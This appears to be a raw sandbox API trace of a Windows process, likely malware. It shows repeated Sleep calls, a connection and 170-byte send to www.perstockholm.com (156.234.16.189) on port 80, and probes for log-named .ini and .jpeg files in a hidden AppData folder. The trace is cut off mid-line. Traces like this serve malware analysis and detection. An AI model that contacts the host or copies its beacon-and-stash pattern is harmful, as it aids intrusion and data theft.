[0191.590] Sleep (dwMilliseconds=0x7d0) [0191.591] Sleep (dwMilliseconds=0x7d0) [0191.593] Sleep (dwMilliseconds=0x7d0) [0191.594] Sleep (dwMilliseconds=0x7d0) [0191.595] Sleep (dwMilliseconds=0x7d0) [0191.597] Sleep (dwMilliseconds=0x7d0) [0191.599] Sleep (dwMilliseconds=0x7d0) [0191.600] Sleep (dwMilliseconds=0x7d0) [0191.601] Sleep (dwMilliseconds=0x7d0) [0191.603] Sleep (dwMilliseconds=0x7d0) [0191.604] Sleep (dwMilliseconds=0x7d0) [0191.611] Sleep (dwMilliseconds=0x7d0) [0191.612] Sleep (dwMilliseconds=0x7d0) [0191.614] Sleep (dwMilliseconds=0x7d0) [0191.615] Sleep (dwMilliseconds=0x7d0) [0191.620] Sleep (dwMilliseconds=0x7d0) [0191.621] Sleep (dwMilliseconds=0x7d0) [0191.624] Sleep (dwMilliseconds=0x7d0) [0191.625] Sleep (dwMilliseconds=0x7d0) [0191.747] Sleep (dwMilliseconds=0x7d0) [0191.748] Sleep (dwMilliseconds=0x7d0) [0191.750] Sleep (dwMilliseconds=0x7d0) [0191.751] Sleep (dwMilliseconds=0x7d0) [0191.753] Sleep (dwMilliseconds=0x7d0) [0191.757] Sleep (dwMilliseconds=0x7d0) [0191.758] Sleep (dwMilliseconds=0x7d0) [0191.760] Sleep (dwMilliseconds=0x7d0) [0191.761] Sleep (dwMilliseconds=0x7d0) [0191.763] Sleep (dwMilliseconds=0x7d0) [0191.764] Sleep (dwMilliseconds=0x7d0) [0191.770] Sleep (dwMilliseconds=0x7d0) [0191.772] Sleep (dwMilliseconds=0x7d0) [0191.773] Sleep (dwMilliseconds=0x7d0) [0191.775] Sleep (dwMilliseconds=0x7d0) [0191.781] Sleep (dwMilliseconds=0x7d0) [0191.782] Sleep (dwMilliseconds=0x7d0) [0191.784] Sleep (dwMilliseconds=0x7d0) [0191.786] Sleep (dwMilliseconds=0x7d0) [0191.792] Sleep (dwMilliseconds=0x7d0) [0191.793] Sleep (dwMilliseconds=0x7d0) [0191.795] Sleep (dwMilliseconds=0x7d0) [0191.796] Sleep (dwMilliseconds=0x7d0) [0191.803] Sleep (dwMilliseconds=0x7d0) [0191.804] Sleep (dwMilliseconds=0x7d0) [0191.805] Sleep (dwMilliseconds=0x7d0) [0191.817] Sleep (dwMilliseconds=0x7d0) [0191.819] Sleep (dwMilliseconds=0x7d0) [0191.821] Sleep (dwMilliseconds=0x7d0) [0191.822] Sleep (dwMilliseconds=0x7d0) [0191.824] Sleep (dwMilliseconds=0x7d0) [0191.830] Sleep (dwMilliseconds=0x7d0) [0191.831] Sleep (dwMilliseconds=0x7d0) [0191.833] Sleep (dwMilliseconds=0x7d0) [0191.834] Sleep (dwMilliseconds=0x7d0) [0191.836] Sleep (dwMilliseconds=0x7d0) [0191.840] Sleep (dwMilliseconds=0x7d0) [0191.841] Sleep (dwMilliseconds=0x7d0) [0191.843] Sleep (dwMilliseconds=0x7d0) [0191.844] Sleep (dwMilliseconds=0x7d0) [0191.846] Sleep (dwMilliseconds=0x7d0) [0191.847] Sleep (dwMilliseconds=0x7d0) [0191.849] Sleep (dwMilliseconds=0x7d0) [0191.850] Sleep (dwMilliseconds=0x7d0) [0191.852] Sleep (dwMilliseconds=0x7d0) [0191.853] Sleep (dwMilliseconds=0x7d0) [0191.855] Sleep (dwMilliseconds=0x7d0) [0191.856] Sleep (dwMilliseconds=0x7d0) [0191.859] Sleep (dwMilliseconds=0x7d0) [0191.860] Sleep (dwMilliseconds=0x7d0) [0191.862] Sleep (dwMilliseconds=0x7d0) [0191.864] Sleep (dwMilliseconds=0x7d0) [0191.865] Sleep (dwMilliseconds=0x7d0) [0191.867] Sleep (dwMilliseconds=0x7d0) [0191.868] Sleep (dwMilliseconds=0x7d0) [0191.870] Sleep (dwMilliseconds=0x7d0) [0191.871] Sleep (dwMilliseconds=0x7d0) [0191.873] Sleep (dwMilliseconds=0x7d0) [0191.874] Sleep (dwMilliseconds=0x7d0) [0191.876] Sleep (dwMilliseconds=0x7d0) [0191.877] Sleep (dwMilliseconds=0x7d0) [0191.879] Sleep (dwMilliseconds=0x7d0) [0191.880] Sleep (dwMilliseconds=0x7d0) [0191.882] Sleep (dwMilliseconds=0x7d0) [0191.883] Sleep (dwMilliseconds=0x7d0) [0191.885] Sleep (dwMilliseconds=0x7d0) [0191.886] Sleep (dwMilliseconds=0x7d0) [0191.888] Sleep (dwMilliseconds=0x7d0) [0191.889] Sleep (dwMilliseconds=0x7d0) [0191.891] Sleep (dwMilliseconds=0x7d0) [0191.892] Sleep (dwMilliseconds=0x7d0) [0191.894] Sleep (dwMilliseconds=0x7d0) [0191.895] Sleep (dwMilliseconds=0x7d0) [0191.897] Sleep (dwMilliseconds=0x7d0) [0191.899] Sleep (dwMilliseconds=0x7d0) [0191.901] Sleep (dwMilliseconds=0x7d0) [0191.903] Sleep (dwMilliseconds=0x7d0) [0191.905] Sleep (dwMilliseconds=0x7d0) [0191.906] Sleep (dwMilliseconds=0x7d0) [0191.908] Sleep (dwMilliseconds=0x7d0) [0191.909] Sleep (dwMilliseconds=0x7d0) [0191.911] Sleep (dwMilliseconds=0x7d0) [0191.913] Sleep (dwMilliseconds=0x7d0) [0191.914] Sleep (dwMilliseconds=0x7d0) [0191.916] Sleep (dwMilliseconds=0x7d0) [0191.917] Sleep (dwMilliseconds=0x7d0) [0191.919] Sleep (dwMilliseconds=0x7d0) [0191.920] Sleep (dwMilliseconds=0x7d0) [0191.922] Sleep (dwMilliseconds=0x7d0) [0191.923] Sleep (dwMilliseconds=0x7d0) [0191.925] Sleep (dwMilliseconds=0x7d0) [0191.927] Sleep (dwMilliseconds=0x7d0) [0191.928] socket (af=2, type=1, protocol=6) returned 0x1ec0 [0191.928] getaddrinfo (in: pNodeName="www.perstockholm.com", pServiceName="80", pHints=0x9e75998*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x9e759c8 | out: ppResult=0x9e759c8*=0xa05e990*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f91c50*(sa_family=2, sin_port=0x50, sin_addr="156.234.16.189"), ai_next=0x0)) returned 0 [0192.119] connect (s=0x1ec0, name=0x9f91c50*(sa_family=2, sin_port=0x50, sin_addr="156.234.16.189"), namelen=16) returned 0 [0192.315] send (s=0x1ec0, buf=0x82e10fa*, len=170, flags=0) returned 170 [0192.316] setsockopt (s=0x1ec0, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0192.316] recv (in: s=0x1ec0, buf=0x127cf040, len=2048000, flags=0 | out: buf=0x127cf040) returned 0 [0192.536] closesocket (s=0x1ec0) returned 0 [0192.536] Sleep (dwMilliseconds=0x7d0) [0192.538] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.538] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0192.538] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0192.538] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e067d0) returned 1 [0192.538] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.538] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0192.538] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0192.538] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e074c0) returned 1 [0192.538] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.538] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0192.539] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0192.539] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e06e90) returned 1 [0192.539] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.539] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0192.539] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0192.539] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e067d0) returned 1 [0192.539] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.539] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0192.539] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0192.539] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e07280) returned 1 [0192.539] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.539] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0192.539] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0192.539] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e067d0) returned 1 [0192.539] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.539] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0192.539] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0192.539] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e067d0) returned 1 [0192.539] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.539] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0192.540] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0192.540] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e067d0) returned 1 [0192.540] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.540] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0192.540] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0192.540] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e067d0) returned 1 [0192.540] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.540] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0192.540] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0192.540] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e06e90) returned 1 [0192.540] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.540] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0192.540] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0192.540] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e067d0) returned 1 [0192.540] Sleep (dwMilliseconds=0x7d0) [0192.542] Sleep (dwMilliseconds=0x7d0) [0192.543] Sleep (dwMilliseconds=0x7d0) [0192.547] Sleep (dwMilliseconds=0x7d0) [0192.549] Sleep (dwMilliseconds=0x7d0) [0192.550] Sleep (dwMilliseconds=0x7d0) [0192.552] Sleep (dwMilliseconds=0x7d0) [0192.553] Sleep (dwMilliseconds=0x7d0) [0192.555] Sleep (dwMilliseconds=0x7d0) [0192.556] Sleep (dwMilliseconds=0x7d0) [0192.558] Sleep (dwMilliseconds=0x7d0) [0192.559] Sleep (dwMilliseconds=0x7d0) [0192.561] Sleep (dwMilliseconds=0x7d0) [0192.562] Sleep (dwMilliseconds=0x7d0) [0192.564] Sleep (dwMilliseconds=0x7d0) [0192.566] Sleep (dwMilliseconds=0x7d0) [0192.569] Sleep (dwMilliseconds=0x7d0) [0192.570] Sleep (dwMilliseconds=0x7d0) [0192.572] Sleep (dwMilliseconds=0x7d0) [0192.573] Sleep (dwMilliseconds=0x7d0) [0192.575] Sleep (dwMilliseconds=0x7d0) [0192.576] Sleep (dwMilliseconds=0x7d0) [0192.578] Sleep (dwMilliseconds=0x7d0) [0192.580] Sleep (dwMilliseconds=0x7d0) [0192.581] Sleep (dwMilliseconds=0x7d0) [0192.583] Sleep (dwMilliseconds=0x7d0) [0192.584] Sleep (dwMilliseconds=0x7d0) [0192.586] Sleep (dwMilliseconds=0x7d0) [0192.587] Sleep (dwMilliseconds=0x7d0) [0192.589] Sleep (dwMilliseconds=0x7d0) [0192.590] Sleep (dwMilliseconds=0x7d0) [0192.592] Sleep (dwMilliseconds=0x7d0) [0192.593] Sleep (dwMilliseconds=0x7d0) [0192.595] Sleep (dwMilliseconds=0x7d0) [0192.596] Sleep (dwMilliseconds=0x7d0) [0192.598] Sleep (dwMilliseconds=0x7d0) [0192.599] Sleep (dwMilliseconds=0x7d0) [0192.601] Sleep (dwMilliseconds=0x7d0) [0192.603] Sleep (dwMilliseconds=0x7d0) [0192.604] Sleep (dwMilliseconds=0x7d0) [0192.606] Sleep (dwMilliseconds=0x7d0) [0192.607] Sleep (dwMilliseconds=0x7d0) [0192.609] Sleep (dwMilliseconds=0x7d0) [0192.610] Sleep (dwMilliseconds=0x7d0) [0192.613] Sleep (dwMilliseconds=0x7d0) [0192.614] Sleep (dwMilliseconds=0x7d0) [0192.616] Sleep (dwMilliseconds=0x7d0) [0192.617] Sleep (dwMilliseconds=0x7d0) [0192.619] Sleep (dwMilliseconds=0x7d0) [0192.623] Sleep (dwMilliseconds=0x7d0) [0192.624] Sleep (dwMilliseconds=0x7d0) [0192.655] Sleep (dwMilliseconds=0x7d0) [0192.657] Sleep (dwMilliseconds=0x7d0) [0192.658] Sleep (dwMilliseconds=0x7d0) [0192.660] Sleep (dwMilliseconds=0x7d0) [0192.661] Sleep (dwMilliseconds=0x7d0) [0192.663] Sleep (dwMilliseconds=0x7d0) [0192.664] Sleep (dwMilliseconds=0x7d0) [0192.666] Sleep (dwMilliseconds=0x7d0) [0192.668] Sleep (dwMilliseconds=0x7d0) [0192.670] Sleep (dwMilliseconds=0x7d0) [0192.671] Sleep (dwMilliseconds=0x7d0) [0192.673] Sleep (dwMilliseconds=0x7d0) [0192.674] Sleep (dwMilliseconds=0x7d0) [0192.676] Sleep (dwMilliseconds=0x7d0) [0192.678] Sleep (dwMilliseconds=0x7d0) [0192.679] Sleep (dwMilliseconds=0x7d0) [0192.681] Sleep (dwMilliseconds=0x7d0) [0192.682] Sleep (dwMilliseconds=0x7d0) [0192.684] Sleep (dwMilliseconds=0x7d0) [0192.685] Sleep (dwMilliseconds=0x7d0) [0192.687] Sleep (dwMilliseconds=0x7d0) [0192.690] Sleep (dwMilliseconds=0x7d0) [0192.691] Sleep (dwMilliseconds=0x7d0) [0192.693] Sleep (dwMilliseconds=0x7d0) [0192.694] Sleep (dwMilliseconds=0x7d0) [0192.696] Sleep (dwMilliseconds=0x7d0) [0192.697] Sleep (dwMilliseconds=0x7d0) [0192.699] Sleep (dwMilliseconds=0x7d0) [0192.700] Sleep (dwMilliseconds=0x7d0) [0192.702] Sleep (dwMilliseconds=0x7d0) [0192.703] Sleep (dwMilliseconds=0x7d0) [0192.705] Sleep (dwMilliseconds=0x7d0) [0192.706] Sleep (dwMilliseconds=0x7d0) [0192.708] Sleep (dwMilliseconds=0x7d0) [0192.709] Sleep (dwMilliseconds=0x7d0) [0192.711] Sleep (dwMilliseconds=0x7d0) [0192.713] Sleep (dwMilliseconds=0x7d0) [0192.714] Sleep (dwMilliseconds=0x7d0) [0192.716] Sleep (dwMilliseconds=0x7d0) [0192.717] Sleep (dwMilliseconds=0x7d0) [0192.719] Sleep (dwMilliseconds=0x7d0) [0192.720] Sleep (dwMilliseconds=0x7d0) [0192.722] Sleep (dwMilliseconds=0x7d0) [0192.723] Sleep (dwMilliseconds=0x7d0) [0192.725] Sleep (dwMilliseconds=0x7d0) [0192.726] Sleep (dwMilliseconds=0x7d0) [0192.728] Sleep (dwMilliseconds=0x7d0) [0192.729] Sleep (dwMilliseconds=0x7d0) [0192.731] Sleep (dwMilliseconds=0x7d0) [0192.734] Sleep (dwMilliseconds=0x7d0) [0192.735] Sleep (dwMilliseconds=0x7d0) [0192.737] Sleep (dwMilliseconds=0x7d0) [0192.739] Sleep (dwMilliseconds=0x7d0) [0192.740] Sleep (dwMilliseconds=0x7d0) [0192.742] Sleep (dwMilliseconds=0x7d0) [0192.744] Sleep (dwMilliseconds=0x7d0) [0192.746] Sleep (dwMilliseconds=0x7d0) [0192.747] Sleep (dwMilliseconds=0x7d0) [0192.749] Sleep (dwMilliseconds=0x7d0) [0192.750] Sleep (dwMilliseconds=0x7d0) [0192.752] Sleep (dwMilliseconds=0x7d0) [0192.754] Sleep (dwMilliseconds=0x7d0) [0192.757] Sleep (dwMilliseconds=0x7d0) [0192.758] Sleep (dwMilliseconds=0x7d0) [0192.760] Sleep (dwMilliseconds=0x7d0) [0192.761] Sleep (dwMilliseconds=0x7d0) [0192.763] Sleep (dwMilliseconds=0x7d0) [0192.765] Sleep (dwMilliseconds=0x7d0) [0192.767] Sleep (dwMilliseconds=0x7d0) [0192.768] Sleep (dwMilliseconds=0x7d0) [0192.770] Sleep 